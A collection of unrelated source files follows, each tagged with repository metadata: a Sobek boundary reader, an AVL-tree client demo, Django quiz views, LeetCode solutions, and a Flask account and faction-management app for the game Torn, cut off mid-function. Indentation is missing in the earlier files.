cntl_def["table"]["data"] = pd.Series(data=values, index=date_time)
result[def_id] = cntl_def
return result
def boundaries(path):
"""Read boundaries from a sobek case."""
result = dict()
with path.joinpath("boundary.dat").open() as boundary_dat:
result["flow"] = dict()
for line in boundary_dat:
if re.match("FLBO", line):
ident = __between(line, "id", "st").replace(" ", "").replace("'", "")
result["flow"][ident] = {
"TYPE": __flow_boundary_types[
re.search(".ty ([0-9]).", line).group(1)
]
}
result["flow"] = pd.DataFrame.from_dict(result["flow"], orient="index")
return result
| d2hydro/sobek_kisters | sobek/read.py | read.py | py | 20,927 | python | en | code | 0 | github-code | 36 |
16076269490 | from cliente import Cliente
from AVL_tree import AVLTree
from merge_sort import merge
if __name__ == "__main__":
tree = AVLTree()
clientes = [
Cliente("João Silva", "1990-05-15", "123-4567", "joao@gmail.com", "Rua A, Bairro X, Cidade Y", "11111111111"),
Cliente("Maria Santos", "1985-08-20", "987-6543", "maria@yahoo.com", "Rua B, Bairro Z, Cidade X",
"22222222222"),
Cliente("Pedro Oliveira", "1982-03-10", "555-1234", "pedro@hotmail.com", "Rua C, Bairro Y, Cidade Z",
"33333333333"),
Cliente("Ana Pereira", "1995-11-25", "333-9999", "ana@outlook.com", "Rua D, Bairro W, Cidade V", "44444444444"),
Cliente("Luiz Costa", "1988-07-02", "222-5678", "luiz@gmail.com", "Rua E, Bairro V, Cidade U", "55555555555"),
Cliente("Laura Rodrigues", "1983-12-30", "777-9876", "laura@yahoo.com", "Rua F, Bairro U, Cidade T",
"66666666666"),
Cliente("Carlos Alves", "1998-09-05", "888-4321", "carlos@hotmail.com", "Rua G, Bairro T, Cidade S",
"77777777777"),
Cliente("Fernanda Nunes", "1980-02-14", "111-1111", "fernanda@outlook.com", "Rua H, Bairro S, Cidade R",
"88888888888"),
Cliente("Rafael Lima", "1987-06-18", "666-7890", "rafael@gmail.com", "Rua I, Bairro R, Cidade Q",
"99999999999"),
Cliente("Mariana Silva", "1993-04-28", "444-2345", "mariana@yahoo.com", "Rua J, Bairro Q, Cidade P",
"10101010101"),
Cliente("Lucas Santos", "1989-10-11", "555-8765", "lucas@hotmail.com", "Rua K, Bairro P, Cidade O",
"11111111112"),
Cliente("Isabela Oliveira", "1991-07-07", "777-5432", "isabela@outlook.com", "Rua L, Bairro O, Cidade N",
"12121212121"),
Cliente("Gustavo Pereira", "1984-01-03", "222-4321", "gustavo@gmail.com", "Rua M, Bairro N, Cidade M",
"13131313131"),
Cliente("Camila Ferreira", "1997-08-16", "999-1111", "camila@yahoo.com", "Rua N, Bairro M, Cidade L",
"14141414141"),
Cliente("Thiago Costa", "1994-03-22", "444-5678", "thiago@hotmail.com", "Rua O, Bairro L, Cidade K",
"15151515151"),
Cliente("Julia Rodrigues", "1986-12-09", "555-4321", "julia@outlook.com", "Rua P, Bairro K, Cidade J",
"16161616161"),
Cliente("Roberto Alves", "1981-05-27", "333-3456", "roberto@gmail.com", "Rua Q, Bairro J, Cidade I",
"17171717171"),
Cliente("Renata Nunes", "1996-02-02", "777-2222", "renata@yahoo.com", "Rua R, Bairro I, Cidade H",
"18181818181"),
Cliente("Marcos Lima", "1992-11-14", "222-6789", "marcos@hotmail.com", "Rua S, Bairro H, Cidade G",
"19191919191"),
Cliente("Aline Silva", "1983-07-26", "888-9876", "aline@outlook.com", "Rua T, Bairro G, Cidade F",
"20202020202"),
]
print("Todos os clientes cadastrados:")
for i, cliente in enumerate(clientes, start=1):
print(f"\nCliente {i}:")
print(cliente)
tree.insert(cliente)
print("\n===============================================================\n")
print("Fatores de balanceamento da árvore:")
all_balance_factor = tree.get_all_balance_factors()
for balance_factor in all_balance_factor:
print(f"{balance_factor}\n")
print("\n===============================================================\n")
print("Clientes em ordem alfabética:")
tree_arr = tree.inorder_traversal()
merge(tree_arr, 0, len(tree_arr) - 1)
for element in tree_arr:
print(f"{element}\n")
print("\n===============================================================\n")
print("Buscando Clientes por CPF:")
print("\nCPF '22222222222':")
cpf_busca = "22222222222"
resultado_busca, comparacoes = tree.search(cpf_busca)
if resultado_busca is not None:
encontrado = resultado_busca
print(f"\nCliente encontrado: {encontrado.nome}")
print(f"Comparação necessária para encontrar: {len(comparacoes)}")
print("Comparações feitas durante a busca:")
for i, cpf_comparacao in enumerate(comparacoes):
print(f"Comparação {i + 1}: {cpf_comparacao}")
else:
print(f"\nCliente com CPF {cpf_busca} não encontrado.")
print("\nCPF '10101010101':")
cpf_busca = "10101010101"
resultado_busca, comparacoes = tree.search(cpf_busca)
if resultado_busca is not None:
encontrado = resultado_busca
print(f"\nCliente encontrado: {encontrado.nome}")
print(f"Comparação necessária para encontrar: {len(comparacoes)}")
print("Comparações feitas durante a busca:")
for i, cpf_comparacao in enumerate(comparacoes):
print(f"Comparação {i + 1}: {cpf_comparacao}")
else:
print(f"\nCliente com CPF {cpf_busca} não encontrado.")
print("\nCPF '99999999999':")
cpf_busca = "99999999999"
resultado_busca, comparacoes = tree.search(cpf_busca)
if resultado_busca is not None:
encontrado = resultado_busca
print(f"\nCliente encontrado: {encontrado.nome}")
print(f"Comparação necessária para encontrar: {len(comparacoes)}")
print("Comparações feitas durante a busca:")
for i, cpf_comparacao in enumerate(comparacoes):
print(f"Comparação {i + 1}: {cpf_comparacao}")
else:
print(f"\nCliente com CPF {cpf_busca} não encontrado.")
print("\n===============================================================\n")
print("Buscando Clientes por email")
print("\nEmail 'rafael@gmail.com':")
email_busca = "rafael@gmail.com"
encontrado_pelo_email = {"cliente": None, "index": None}
for i, cliente in enumerate(clientes, start=0):
if cliente.email == email_busca:
encontrado_pelo_email["cliente"] = cliente
encontrado_pelo_email["index"] = i
break
if encontrado_pelo_email is not None:
print(f"\nCliente encontrado: {encontrado_pelo_email['cliente'].nome} (index: {encontrado_pelo_email['index']})")
else:
print(f"\nCliente com email {email_busca} não encontrado.") | shDupont/pythonProject | main.py | main.py | py | 6,219 | python | pt | code | 1 | github-code | 36 |
28184080541 | #### @author Arda Göktaş
#### @version 3.11
#### @since 13.12.2022
### @Purposes It exists to send questions and answers in a certain category as an object to the front-end.
class QuizViewSet(viewsets.ModelViewSet): ### to see all the questions in a category
queryset = Quiz.objects.all() ##Retrieves all the quizzes in the database
serializer_class = QuizSerializer ##
@action(detail=True,methods=['get']) ## get method specified to get all questions
def all_questions(self, request, pk=None): # all_question function used to retrieve questions
questions = Question.objects.filter(quiz_id=pk) # Filtering questions by API from url
serializer = QuestionSerializer(
questions,
many=True
) # Specifies the information to be used in the retur section
return Response(serializer.data) # Returns the used information over data
#### @author Mustafa Sergen Haysal
#### @version 3.11
#### @since 13.12.2022
### @Purposes Used to get answers to a specific question and to add a new answer.
class ListCreateAnswer(generics.ListCreateAPIView):
queryset = Answer.objects.all() ### initalize query with all answers in database
serializer_class = AnswerSerializer
def get_queryset(self): ## function that returns only answers to a particular question
return self.queryset.filter(
Q(question__quiz_id=self.kwargs.get('quiz_pk')),
Q(question_id=self.kwargs.get('question_pk'))
) # Return for filter
def perform_create(self, serializer): ## function used to add an answer to a particular question
question = get_object_or_404(
Question,
pk=self.kwargs.get('id')
) # match by id
serializer.save(question=question) | SU-CS308-22FA/Team17-backend | Code Documentation/Code Documentation for py.py | Code Documentation for py.py | py | 1,768 | python | en | code | 0 | github-code | 36 |
17613399951 | # https://leetcode-cn.com/problems/permutations/
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
result = []
def backtrace(use_list: List[int], tmp: List[int]):
if len(tmp) == len(nums):
result.append(tmp)
return
for i in range(len(use_list)):
backtrace(use_list[:i] + use_list[i+1:], tmp + [use_list[i]])
backtrace(nums, [])
return result
| xy-hong/codeSnippet | src/python/permutations.py | permutations.py | py | 511 | python | en | code | 0 | github-code | 36 |
2722176063 | class Solution(object):
def updateMatrix(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
cols = len(matrix[0])
rows = len(matrix)
q = []
dist = [ [float('inf') for _ in range(cols)] for _ in range(rows)]
# initialize the distance matrix: reuslt
for i in range(rows):
for j in range(cols):
if matrix[i][j] == 0:
dist[i][j] = 0
q.append((i, j))
# classical bfs structure
while q:
x, y = q[0]
q.pop(0)
for a, b in [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)]:
if 0<=a<rows and 0<=b<cols and dist[a][b]-dist[x][y] > 1:
dist[a][b] = dist[x][y] + 1
q.append((a, b))
return dist
def main():
S = Solution()
matrix = \
[[0,0,0],
[0,1,0],
[1,1,1]]
a = S.updateMatrix(matrix)
print(a)
if __name__ == "__main__":
main()
| ZhengLiangliang1996/Leetcode_ML_Daily | Search/542_BFS_01Matrix.py | 542_BFS_01Matrix.py | py | 1,085 | python | en | code | 1 | github-code | 36 |
14640804692 | import logging
import logging.handlers
from flask import Flask, render_template, redirect, request
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from forms import LoginForm, PaymentForm, PasswordForm, OccalcForm, ApikeyForm, DeleteForm, RegisterForm, OCpolicyForm, LeaderForm, EnemyForm, TimeForm, DeleteEnemyForm, AddEnemyForm
import base64
import datetime
import hashlib
import hmac
import json
import pandas as pd
import re
import sqlite3
import time
import read_sqlite
import dehtml
import random
import password
import challenge
re.numeric = re.compile('^[0-9]+$')
token = re.compile('^([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for graphs
combat_token = re.compile('^([-\d]+)-([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for combat events
bonus_token = re.compile('^([-\d]+)-([-\d]+)bonus(\d+)-([0-9a-f]+)$') # used for chain bonus record
armory_token = re.compile('^([-\d]+)-(\d+)-([0-9a-f]+)$')
enemy_token = re.compile('^([-\d]+)-(\d+)-(\d+)-([0-9a-f]+)$')
target_token = re.compile('^([-\d]+)-(\d+)-(\d+)-(\d+)-([0-9a-f]+)$')
time_interval = re.compile('^(\d+)-(\d+)$')
# f_id, crimetype, timestamp, (either number or 'history'), hmac
oc_history_picker = re.compile('^([-\d]+)-([0-9])-([0-9]+)-([0-9a-z]+)-([0-9a-f]+)$')
chain_token = re.compile('^(\d+)-chain-(\d+)-(\d+)-([0-9a-f]+)$')
chain_token_o = re.compile('^(\d+)-scoreboard-(\d+)-(\d+)-([0-9a-f]+)-([a-z]+)$') # with ordering parameter
now = int(time.time())
# Now there is just one way to read this.
rodb = read_sqlite.Rodb()
hmac_key = rodb.getkey()
rodb = None
app = Flask(__name__)
app.config.from_pyfile('config.py')
loghandler = logging.handlers.RotatingFileHandler('/home/peabrain/logs/tu0036.log', maxBytes=1024 * 1024, backupCount=10)
loghandler.setLevel(logging.INFO)
app.logger.setLevel(logging.INFO)
app.logger.addHandler(loghandler)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
class LUser(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30), unique=True) # torn numeric id
login_allowed = db.Column(db.Integer) # int used as bool
must_change_pw = db.Column(db.Integer) # int used as bool
pwhash = db.Column(db.String(255)) # a hash
registered = db.Column(db.Integer) # et account created
confirmed = db.Column(db.Integer) # et confirmed, or 0 if not confirmed
last_login = db.Column(db.Integer) # et
failed_logins = db.Column(db.Integer) # reset to 0 on success
pw_ver = db.Column(db.Integer) # 1=sha1, 2=bcrypt
#
# see is_authenticated() is_anonymous() get_id()
class Payment_cache(db.Model):
id = db.Column(db.Integer, primary_key=True)
faction_id = db.Column(db.Integer)
oc_plan_id = db.Column(db.Integer)
timestamp = db.Column(db.Integer)
paid_by = db.Column(db.Integer)
class Report_number_oc(db.Model):
id = db.Column(db.Integer, primary_key=True)
timestamp = db.Column(db.Integer)
pid = db.Column(db.Integer)
number_oc = db.Column(db.Integer)
class Banned_pw(db.Model):
id = db.Column(db.Integer, primary_key=True)
sha = db.Column(db.String(40)) # sha1 of a prohibited pw
class Apikey_history(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30))
et_web_update = db.Column(db.Integer)
deleted = db.Column(db.Integer)
class Ocpolicy(db.Model):
id = db.Column(db.Integer, primary_key=True)
faction = db.Column(db.Integer)
timestamp = db.Column(db.Integer)
percent = db.Column(db.Numeric(6,2))
username = db.Column(db.String(30))
octype = db.Column(db.Integer)
class Extra_leaders(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
faction_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
is_leader = db.Column(db.Integer)
set_by = db.Column(db.Integer)
class Challenge(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
expires = db.Column(db.Integer)
used = db.Column(db.Integer)
username = db.Column(db.String(30), unique=True) # torn numeric id
action = db.Column(db.String(20))
data = db.Column(db.String(60))
pw_ver = db.Column(db.Integer)
pw_ver = db.Column(db.Integer)
chal_type = db.Column(db.String(10))
expect = db.Column(db.String(40))
class Response(db.Model):
id = db.Column(db.Integer, primary_key=True)
et = db.Column(db.Integer)
used = db.Column(db.Integer)
username = db.Column(db.String(30), unique=True) # torn numeric id
chal_type = db.Column(db.String(10))
provided = db.Column(db.String(40))
class Enemy(db.Model):
id = db.Column(db.Integer, primary_key=True)
tornid = db.Column(db.String(30)) # torn numeric id
username = db.Column(db.String(30))
f_id = db.Column(db.Integer)
class Timerange(db.Model):
id = db.Column(db.Integer, primary_key=True)
tstart = db.Column(db.Integer)
tend = db.Column(db.Integer)
f_id = db.Column(db.Integer)
class Chains(db.Model):
pg_chain_id = db.Column(db.Integer, primary_key=True)
f_id = db.Column(db.Integer)
et = db.Column(db.Integer)
chain_len = db.Column(db.Integer)
tstart = db.Column(db.Integer)
tend = db.Column(db.Integer)
torn_chain_id = db.Column(db.Integer)
respect = db.Column(db.String(16))
class Chain_player_sum(db.Model):
pk = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
actions = db.Column(db.Integer)
attacked = db.Column(db.Integer)
hospitalized = db.Column(db.Integer)
mugged = db.Column(db.Integer)
respect = db.Column(db.Integer)
att_stale = db.Column(db.Integer)
lost = db.Column(db.Integer)
att_escape = db.Column(db.Integer)
def_stale = db.Column(db.Integer)
defend = db.Column(db.Integer)
def_escape = db.Column(db.Integer)
class Chain_members(db.Model):
mempk = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
player_id = db.Column(db.Integer)
player_name = db.Column(db.String(16))
class Bonus_events(db.Model):
bonus_pk_id = db.Column(db.Integer, primary_key=True)
pg_chain_id = db.Column(db.Integer)
et = db.Column(db.Integer)
att_name = db.Column(db.String(16))
att_id = db.Column(db.Integer)
verb = db.Column(db.String(16))
def_name = db.Column(db.String(16))
def_id = db.Column(db.Integer)
outcome = db.Column(db.String(20))
num_respect = db.Column(db.Numeric(12,4))
@login_manager.user_loader
def load_user(user_id):
return LUser.query.get(int(user_id)) # returns whole object
# this logs someone out
@app.route('/logout')
def logout():
logout_user()
return redirect('/')
#=================================================================================
def obtain_leaders_for_faction(pid, fid):
# extra leaders from ORM
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(pid)
extra = {faction_sum['leader']: [1, 1, faction_sum['leadername'], 'Torn', 'mists of time'], faction_sum['coleader']: [1, 1, faction_sum['coleadername'], 'Torn', 'mists of time']}
leader_orm = {}
extras = Extra_leaders.query.filter_by(faction_id = fid).all()
for leader in extras:
pid = leader.player_id
if (not pid in leader_orm) or (leader.et > leader_orm[pid][1]):
leader_orm[leader.player_id] = [leader.is_leader, leader.et, rodb.pid2n[str(pid)], rodb.pid2n[str(leader.set_by)], time.strftime("%Y-%m-%d %H:%M",time.gmtime(leader.et))]
# only the players with a 1 for is_leader from their latest record in ORM and the two recignised by Torn
for kl in leader_orm.keys():
if leader_orm[kl][0]: extra[kl] = leader_orm[kl]
return extra
#=================================================================================
def bool_leader(pid, fid):
leaders = obtain_leaders_for_faction(pid, fid)
return pid in leaders
#=================================================================================
@app.route('/', methods = ['GET','POST'])
@app.route('/login', methods = ['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
reject = True # assume rejection
allowed_login = False
except:
app.logger.info('error reading from login form')
return render_template('login.html', title='Sign In', form=form)
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
# unknown username
if not re.numeric.match(u):
u = 'bad username (must be all numeric)'
return render_template('bad_login.html', title='bad login attempt', u=u)
try:
lastt = wantuser.last_login
nfail = wantuser.failed_logins
hash_version = wantuser.pw_ver
except:
return "failed somehow"
return render_template('login.html', title='Sign In', form=form)
if wantuser.login_allowed and password.checkpw(hash_version, p, wantuser.pwhash):
reject = False
if not reject:
wantuser.last_login = int(time.time())
wantuser.failed_logins = 0
login_user(wantuser)
db.session.commit()
if lastt:
lastt = datetime.datetime.fromtimestamp(lastt)
else:
lastt = 'never'
app.logger.info('%s logged in successfully', u)
for rh in request.headers:
app.logger.info('%s had request header %s', u, rh)
return render_template('good_login.html', title='successful login', u=u, nfail=nfail, lastt=lastt, must_change_pw=wantuser.must_change_pw)
wantuser.failed_logins += 1
db.session.commit()
return render_template('bad_login.html', title='bad login attempt', u=u)
# show form before submission
return render_template('login.html', title='Sign In', form=form)
#=================================================================================
# This is for testing flask without the web server.
@app.route("/rhubarb/<anything_here>", methods=['GET'])
def no_rhubarb(anything_here):
return redirect('/' + anything_here)
#=================================================================================
@app.route('/register', methods = ['GET','POST'])
def register():
form = RegisterForm()
u = 'default-u'
p = 'default-p'
c = 'default-c'
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
c = request.form['checkbox']
except:
return render_template('register.html', title='Register', form=form, retry=True)
# is username numeric?
if not re.numeric.match(u):
return render_template('accounts_explained.html', title='Accounts Explained')
# does user already exist?
wantuser = LUser.query.filter_by(username = u).first()
if wantuser:
return render_template('message.html', message='That username is already in use. If already registered and confirmed use login. Or wait for a past registration attempt to expire and retry.', logged_in=False)
# is pw acceptable?
if not test_strength(p):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
# is cookie consent on?
if c != 'yes':
return render_template('message.html', title='Message', message='Consent to a cookie (for a logged-in session) is required.', logged_in=False)
pw_ver, pwhash = password.pwhash(0, p)
et = int(time.time())
newu = LUser (username=str(u), login_allowed=0, must_change_pw=0, pw_ver=pw_ver, pwhash=pwhash, registered=et, confirmed=0, last_login=0, failed_logins=0)
db.session.add(newu)
db.session.commit()
# set challenge to be done before confirmed is set
new_random_challenge = challenge.Challenge()
expected = 'NEWUSER:' + new_random_challenge.get_rfc1760_challenge()
newc = Challenge(et=et, expires=et+900, used=0, username=u, action='newuser', data='', chal_type='message', expect=expected, pw_ver=pw_ver)
db.session.add(newc)
db.session.commit()
return render_template('challenge.html', title='In-game challenge', challenge=expected)
return render_template('register.html', title='Register', form=form, retrry=False)
#=================================================================================
# This is not the same as "settings" change when pw is known.
@app.route("/rhubarb/unknown_pw_reset", methods=['GET','POST'])
@app.route("/unknown_pw_reset", methods=['GET','POST'])
def unknown_pw_reset():
form = LoginForm() # requests username and password
# - - - - - - - POST section
if request.method == 'POST':
u = None
p = None
if form.validate_on_submit():
try:
u = request.form['username']
p = request.form['password']
# another job either uses or discards the data provided here
except:
app.logger.info('error reading from login form for pw reset')
return redirect('/rhubarb/unknown_pw_reset')
else:
app.logger.info('change_pw form fails validation')
return redirect('/rhubarb/unknown_pw_reset')
if not test_strength(p):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=False)
ban_digest = hashlib.sha1(bytes(p, 'utf-8')).hexdigest()
ban = Banned_pw(sha = ban_digest)
db.session.add(ban)
db.session.commit()
# rate limit - not too many of these allowed at once
rate_discovery = Challenge.query.filter_by(username = u).all()
if len(rate_discovery) > 10:
return render_template('message.html', message='Too many reset attempts - need to wait.', logged_in=False)
# set challenge to be done before applied to l_user table
new_random_challenge = challenge.Challenge()
expected = 'PWRESET:' + new_random_challenge.get_rfc1760_challenge()
et = int(time.time())
pw_ver, pwhash = password.pwhash(0, p)
newc = Challenge(et=et, expires=et+900, used=0, username=u, action='pwreset', data=pwhash, pw_ver=pw_ver, chal_type='message', expect=expected)
db.session.add(newc)
db.session.commit()
return render_template('challenge.html', title='In-game challenge', challenge=expected)
# - - - - - - - POST section
return render_template('pw_reset.html', form=form)
#=================================================================================
@app.route("/settings", methods=['GET'])
@login_required
def settings():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
# check whether API key has worked recently for player
# XXX and faction
# et_pstats, et_set, short_err, long_err
got_key = [0,0]
ak_stats = list(rodb.has_api_key(u)) # simple numeric values
if ak_stats[0]:
got_key[0] = 1
# compare to ORM
not_obsolete = 1 # assume sqlite is current then check whether there is a more recent psql
wantevent = Apikey_history.query.filter_by(username = u).first()
if wantevent:
if wantevent.et_web_update > ak_stats[1]:
not_obsolete = 0 # psql more recent
if wantevent.deleted:
got_key[0] = 0
# massage for human readability
if ak_stats[0] and ak_stats[3]:
if ak_stats[3] < ak_stats[0]:
# error has been fixed
ak_stats[3] = 0
else:
# problem been seen
got_key[1] = 1
if ak_stats[2] < ak_stats[0]:
# error has been fixed
ak_stats[2] = 0
else:
# problem been seen
got_key[1] = 1
ak_stats[0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[0]))
ak_stats[1] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ak_stats[1]))
oc_calc_sr = 0
want_oc = Report_number_oc.query.filter_by(pid = u).all()
for i in want_oc:
if player['oc_calc'] != i.number_oc:
oc_calc_sr = i.number_oc # self-reported number
return render_template('settings.html', title='Tornutopia Settings', u=u, name=name, player=player, oc_calc_sr=oc_calc_sr, got_key=got_key, ak_stats=ak_stats, not_obsolete=not_obsolete)
#=================================================================================
@app.route("/change_pw", methods=['GET','POST'])
@login_required
def change_pw():
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = PasswordForm()
# - - - - - - - POST section
if request.method == 'POST':
old_pw = None
new_pw = None
if form.validate_on_submit():
try:
old_pw = request.form['old_password']
new_pw = request.form['new_password']
except:
app.logger.info('error reading from change_pw form')
return redirect('/rhubarb/change_pw')
else:
app.logger.info('change_pw form fails validation')
return redirect('/rhubarb/change_pw')
# is old pw correct?
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
# should never happen - has this user been deleted while logged in?
return redirect('/rhubarb/logout')
if not password.checkpw(wantuser.pw_ver, old_pw, wantuser.pwhash):
return render_template('message.html', message='old password incorrect', logged_in=True)
# is new pw acceptable?
if not test_strength(new_pw):
return render_template('message.html', message='That password is not allowed - too obvious.', logged_in=True)
# set new pwhash for u and show success
v,h = password.pwhash(0, new_pw)
if not v or not h:
return render_template('message.html', message='failure to handle new password', logged_in=True)
# set new password and add to banned list
wantuser.pw_ver = v
wantuser.pwhash = h
wantuser.must_change_pw = 0
db.session.commit()
ban_digest = hashlib.sha1(bytes(new_pw, 'utf-8')).hexdigest()
ban = Banned_pw(sha = ban_digest)
db.session.add(ban)
db.session.commit()
return render_template('message.html', message='password changed', logged_in=True)
# - - - - - - - POST section
return render_template('set_pw.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/set_oc_calc", methods=['GET','POST'])
@login_required
def set_oc_calc():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
number_oc = 0
form = OccalcForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
number_oc = request.form['number_oc']
except:
return render_template('message.html', message='Something failed about reading from occalcform.', logged_in=True)
else:
app.logger.info('set_oc_calc form fails validation')
return render_template('message.html', message='Form fails validation.', logged_in=True)
if int(number_oc) > 0:
new_id=int(random.random() * 1000000000)
report_number_oc = Report_number_oc(id=new_id, timestamp=int(time.time()), pid=int(u), number_oc=number_oc)
db.session.add(report_number_oc)
db.session.commit()
return redirect('/rhubarb/settings')
return render_template('set_oc_calc.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_api_key", methods=['GET','POST'])
@login_required
def delete_api_key():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
with open(new_fname, 'w') as api_out:
print("DELETE APIKEY\n" + str(current_user.username) + "\nEND", file=api_out)
event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=1)
db.session.add(event)
db.session.commit()
return render_template('message.html', message='accepted command to delete API key', logged_in=True)
#=================================================================================
@app.route("/set_api_key", methods=['GET','POST'])
@login_required
def set_api_key():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = ApikeyForm()
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
apikey = request.form['apikey']
use_for_faction = request.form['use_for_faction']
except:
return render_template('message.html', message='something failed about reading', logged_in=True)
else:
app.logger.info('error reading from ApikeyForm')
return render_template('message.html', message='ApikeyForm fails validation.', logged_in=True)
new_fname = '/var/torn/spool/collect/' + str(int(random.random() * 1000000000))
with open(new_fname, 'w') as api_out:
print("APIKEY\n" + apikey + '\n' + str(use_for_faction) + "\nEND", file=api_out)
event = Apikey_history(username=str(current_user.username), et_web_update=int(time.time()), deleted=0)
db.session.add(event)
db.session.commit()
return redirect('/rhubarb/settings')
# - - - - - - - POST section
return render_template('set_api_key.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route("/delete_account", methods=['GET','POST'])
@login_required
def delete_account():
u = current_user.username
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
name = player['name']
form = DeleteForm()
# - - - - - - - POST section
if request.method == 'POST':
if form.validate_on_submit():
try:
pw = request.form['password']
except:
return render_template('message.html', title='Delete Failed', message='something failed about reading from deleteform', logged_in=False)
else:
app.logger.info('delete_account form fails validation')
return redirect('/rhubarb/settings')
wantuser = LUser.query.filter_by(username = u).first()
if not wantuser:
return render_template('message.html', title='Delete Failed', message='user to be deleted cannot be found', logged_in=False)
# check password
if not password.checkpw(wantuser.pw_ver, pw, wantuser.pwhash):
return render_template('message.html', title='Delete Failed', message='wrong password', logged_in=True)
db.session.delete(wantuser)
db.session.commit()
return redirect('/rhubarb/logout')
# - - - - - - - POST section
return render_template('delete_account.html', title='Tornutopia Settings', u=u, name=name, player=player, form=form)
#=================================================================================
@app.route('/faction_ov')
@login_required
def faction_ov():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
big_losses = rodb.recent_big_losses(faction_sum['fid'])
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
friendly_fires = rodb.get_friendly_fire(faction_sum['fid'])
# extra leaders from ORM
extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
return render_template('faction_ov.html', title='Faction Overview', u=current_user.username, player=player, faction_sum=faction_sum,
is_leader=is_leader, friendly_fires=friendly_fires, extra=extra, nrbl=len(big_losses), big_losses=big_losses)
#=================================================================================
@app.route('/leaders', methods=['GET','POST'])
@login_required
def leaders():
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
extra = obtain_leaders_for_faction(current_user.username, faction_sum['fid'])
form = LeaderForm()
#
form.player_demote.choices = [(0, 'no selection')]
for eleader in extra:
form.player_demote.choices.append((eleader, extra[eleader][2]))
#
form.player_promote.choices = [(0, 'no selection')]
for pid in sorted(faction_sum['members']):
# members of this faction, and only if they are not leaders already
if not bool_leader(int(pid), faction_sum['fid']):
form.player_promote.choices.append((pid, rodb.pid2n[pid]))
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
player_demote = None
player_promote = None
#
if form.is_submitted():
try:
player_demote = request.form['player_demote']
except:
pass
try:
player_promote = request.form['player_promote']
except:
pass
else:
return render_template('message.html', title='Change leaders', message='validation of LeaderForm failed', logged_in=True)
# player_demote and player_promote are str and '0' is a valid value meaning no selection.
if not player_demote or not player_promote:
return render_template('message.html', title='Change leaders', message='valid input not detected', logged_in=True)
now = int(time.time())
if player_demote != '0':
dl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_demote), is_leader=0, set_by=int(current_user.username))
db.session.add(dl)
if player_promote != '0':
pl = Extra_leaders(et=now, faction_id=int(faction_sum['fid']), player_id=int(player_promote), is_leader=1, set_by=int(current_user.username))
db.session.add(pl)
db.session.commit()
return redirect('/rhubarb/faction_ov')
# - - - - - - - POST section
return render_template('leaders.html', title='Leader Appointment', faction_sum=faction_sum, is_leader=is_leader, form=form)
#=================================================================================
@app.route('/pay_policy', methods=['GET','POST'])
@login_required
def pay_policy():
    """Show and (for leaders) change the faction's OC payment policy.

    GET renders the current per-crime-type payout percentages from the
    read-only sqlite DB plus a "pending" flag when a newer change is cached
    in the ORM.  POST (leaders only) caches a new percentage in Ocpolicy.
    """
    rodb = read_sqlite.Rodb()
    oc_num2title = rodb.get_oc_titles()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    form = OCpolicyForm()
    # populate the crime-type dropdown from the sqlite title table
    form.cn.choices = [(k, oc_num2title[k]) for k in sorted(oc_num2title.keys())]
    # - - - - - - - POST section
    if request.method == 'POST':
        if not is_leader:
            # only leaders may change policy; bounce anyone else out
            return redirect('/rhubarb/logout')
